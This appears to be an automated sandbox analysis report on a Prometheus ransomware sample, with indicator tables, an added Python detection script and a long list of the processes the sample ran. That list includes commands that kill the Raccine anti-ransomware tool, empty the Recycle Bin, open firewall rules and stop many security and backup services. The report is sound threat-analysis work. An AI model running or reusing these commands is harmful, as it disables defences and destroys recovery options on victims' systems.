Analysis Overview
SHA256
9bf0633f41d2962ba5e2895ece2ef9fa7b546ada311ca30f330f0d261a7fb184
Threat Level: Known bad
The file dd4eb8aa3371b7fd821a7a9730c924cf.exe was found to be: Known bad.
Malicious Activity Summary
Prometheus Ransomware
Downloads PsExec from SysInternals website
Modifies extensions of user files
Blocklisted process makes network request
Modifies Windows Firewall
Downloads MZ/PE file
Drops startup file
Deletes itself
Modifies file permissions
Looks up external IP address via web service
Modifies WinLogon
Drops file in Windows directory
Launches sc.exe
Enumerates physical storage devices
Runs net.exe
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Discovers systems in the same network
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Modifies registry key
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
System policy modification
Kills process with taskkill
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-30 11:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-06-02 15:02
Reported
2021-06-02 15:04
Platform
win7v20210410
Max time kernel
134s
Max time network
135s
Command Line
Signatures
Prometheus Ransomware
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
(this row appears 18 times in the original report; duplicates collapsed)
Downloads MZ/PE file
Downloads PsExec from SysInternals website
| Description | Indicator | Process | Target |
| HTTP URL | http://live.sysinternals.com/PsExec.exe | N/A | N/A |
Modifies Windows Firewall
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\MergeUpdate.tiff | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
(this row appears 3 times in the original report; duplicates collapsed)
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | icanhazip.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..." | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
Kills process with taskkill
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
(this row appears 3 times in the original report; duplicates collapsed)
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
(this row appears 3 times in the original report; duplicates collapsed)
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Information..." | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..." | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
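The registry writes in the two tables above do three different jobs, and a detection should score them separately. The LegalNoticeCaption/LegalNoticeText values put the ransom note on the logon screen before anyone signs in; the Winlogon copy landed under Wow6432Node because the sample is a 32-bit process (it runs from SysWOW64) and that key is subject to WOW64 registry redirection, so it is not the view the 64-bit winlogon.exe reads, whereas the Policies\System copy (the location Group Policy uses) lives in a key shared between both views. LocalAccountTokenFilterPolicy = 1 disables the UAC remote restrictions, so local accounts in the Administrators group get an unfiltered token over the network, which is what the PsExec download above needs for lateral movement. EnableLinkedConnections = 1 links drive mappings between the filtered and the elevated token of the same logon session, which puts mapped shares in scope for encryption. The mystartup.lnk dropped into the Startup folder is plain persistence. The following is an added example, not part of the sandbox report or any Triage signature: a small Python triage over event records constructed from the tables above. Tag names, function names and the ransom-word list are this example's own assumptions; it matches on the value name so the Wow6432Node prefix does not matter.

```python
"""Triage of the registry and file indicators in the tables above.

Added example for this report, not part of the sandbox output. The event
records are constructed from the indicator tables on this page; tag names,
function names and the ransom-word list are this example's own assumptions.
"""
import re

# (action, path, value) records constructed from the "Modifies WinLogon",
# "System policy modification", "Drops startup file" and "Modifies Internet
# Explorer settings" tables above; the ransom text is as the report shows it.
RANSOM_TEXT = ("All your files were encrypted, if you want to get them all back, "
               "please carefully read the text note located in your desktop...")
WINLOGON = r"\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon"
POLICIES = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
SAMPLE_EVENTS = [
    ("Set value (str)", WINLOGON + r"\LegalNoticeCaption", "Information..."),
    ("Set value (str)", WINLOGON + r"\LegalNoticeText", RANSOM_TEXT),
    ("Set value (int)", POLICIES + r"\EnableLinkedConnections", "1"),
    ("Set value (str)", POLICIES + r"\legalnoticecaption", "Information..."),
    ("Set value (str)", POLICIES + r"\legalnoticetext", RANSOM_TEXT),
    ("Set value (int)", POLICIES + r"\LocalAccountTokenFilterPolicy", "1"),
    ("File created",
     r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk", None),
    ("Key created",  # benign-looking mshta side effect; must not fire
     r"\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main", None),
]

RANSOM_WORDS = re.compile(r"\b(encrypted|decrypt\w*|ransom|bitcoin)\b", re.I)


def classify_event(action, path, value):
    """Return the list of tags an (action, path, value) record earns."""
    tags = []
    low = path.lower()
    leaf = low.rsplit("\\", 1)[-1]  # value name; Wow6432Node prefix is irrelevant
    if action.startswith("Set value"):
        if leaf in ("legalnoticecaption", "legalnoticetext"):
            tags.append("logon_banner_set")
            if value and RANSOM_WORDS.search(value):
                tags.append("ransom_note_in_logon_banner")
        elif leaf == "localaccounttokenfilterpolicy" and value == "1":
            tags.append("uac_remote_restrictions_disabled")  # full admin token over SMB
        elif leaf == "enablelinkedconnections" and value == "1":
            tags.append("mapped_drives_linked_to_elevated_token")
    elif action == "File created":
        if "\\start menu\\programs\\startup\\" in low and low.endswith(".lnk"):
            tags.append("startup_folder_persistence")
    return tags


def triage(events):
    """Map tag -> list of paths that earned it; empty dict means nothing fired."""
    findings = {}
    for action, path, value in events:
        for tag in classify_event(action, path, value):
            findings.setdefault(tag, []).append(path)
    return findings


def verdict(findings):
    """Ransom banner alone is ransomware; with the remote-token policy change
    it is also preparation for pushing the payload to other hosts."""
    if "ransom_note_in_logon_banner" not in findings:
        return "none"
    if "uac_remote_restrictions_disabled" in findings:
        return "ransomware+lateral_prep"
    return "ransomware"


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for tag, paths in found.items():
        print(tag, len(paths))
    print(verdict(found))
```

Matching on the leaf value name rather than the full key path is deliberate: the same write shows up under Wow6432Node or the native view depending on the bitness of the process that made it, and a rule keyed to one full path misses the other.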
Processes
C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe
"C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe"
C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SysWOW64\net.exe
"net.exe" start Dnscache /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop bedbg /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Dnscache /y
C:\Windows\SysWOW64\net.exe
"net.exe" start FDResPub /y
C:\Windows\SysWOW64\net.exe
"net.exe" start SSDPSRV /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "395958801-8933661151793810850-158212092081090685311883140302228880-203348247"
C:\Windows\SysWOW64\net.exe
"net.exe" start upnphost /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start FDResPub /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EhttpSrv /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start upnphost /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MMS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EPSecurityService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQLEXPRESS /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1164146697-1757351519121954960-1598656531-194259269417710956351476371403917931529"
C:\Windows\SysWOW64\net.exe
"net.exe" stop SavRoam /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1872053314-1445472940324293419-21159644872012361511644811687233454261014497176"
C:\Windows\SysWOW64\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ekrn /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBFCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mozyprobackup /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SDRSVC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ntrtscan /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EPUpdateService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop FA_Scheduler /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop klnagent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ESHASRV /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EsgShKernel /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop YooIT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCloudSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop macmnsvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLWriter /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1997061358-1814872304457674714-448730642926788787392561543676311-1022516745"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFSGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop veeam /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop masvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBackupSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos AutoUpdate Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeIS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop NetMsmqActivator /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer100 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQL Backups /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Enterprise Client Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-11808829151551623970477387295749141643-152999599157424081418553353751668623076"
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SamSs /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop kavfsslp /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MBAMService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Backup Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer110 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop POP3Svc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMGMT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Clean Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeEngineService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MBEndpointAgent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLSERVER /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Filter Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop msftesql$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SstpSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMTA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Device Control Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Symantec System Recovery” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SMTPSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploySvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop UI0Detect /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfefire /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos File Scanner Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFramework /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Veeam Backup Catalog Data Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1806817180-324525989-1350126046-42631602711286792791551640673-355785847-591603542"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop W3Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1349524300-264491354-422650865-170000379-12372704311559823258693977574273300569"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
